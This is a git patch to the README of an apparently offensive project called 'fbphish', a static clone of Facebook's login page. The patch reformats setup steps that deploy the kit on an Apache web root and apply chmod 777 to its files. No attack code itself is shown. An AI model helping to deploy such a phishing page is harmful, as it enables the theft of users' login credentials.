From 6146591bad7efe324d862360071ec4bf4bc0fc5e Mon Sep 17 00:00:00 2001 From: 0xyg3n <0xyg3n@users.noreply.github.com> Date: Sun, 29 Jul 2018 17:23:09 +0300 Subject: [PATCH] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 9ba77d7..7317f8d 100644 --- a/README.md +++ b/README.md @@ -8,9 +8,9 @@ which also means that every image and css code is loaded dynamically and randoml I just collected all the images and the css code and i made them static to the code so it doesn't also require to send any requests to facebook.com. ## Usage -1. service apache2 start -2. git clone https://github.com/0xyg3n/fbphish /var/www/html -3. chmod 777 /var/www/html/* +1. `sudo service apache2 start` +2. `git clone https://github.com/0xyg3n/fbphish /var/www/html` +3. `sudo chmod 777 /var/www/html/* ` ##Troubleshooting